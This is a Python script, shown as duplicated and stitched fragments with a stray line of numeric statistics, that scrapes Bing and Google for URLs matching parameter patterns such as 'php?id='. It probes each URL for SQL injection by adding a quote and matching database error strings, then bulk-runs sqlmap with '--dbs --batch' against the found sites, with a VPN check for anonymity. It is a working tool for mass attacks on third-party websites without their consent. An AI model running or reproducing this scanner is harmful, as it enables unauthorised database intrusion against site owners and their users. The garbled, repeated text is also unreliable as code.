# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
# Loop through urls and add a qoute
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
# Check if vuln - might updated indicationstrings according to
# MySQL
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
# Microsoft SQL server
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
# Oracle Errors
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
# Postgre SQL
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
# Verbose level 1
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
# Verbose level 2
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
# If X is vuln
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
# Skip X or/and exit
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
# Bad X
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Check if sqlmap installed, file, etc.
# =================================
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| 46.040419
| 206
| 0.497773
|
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
# Loop through urls and add a qoute
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
uas = LoadUserAgents()
ua = random.choice(uas)
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
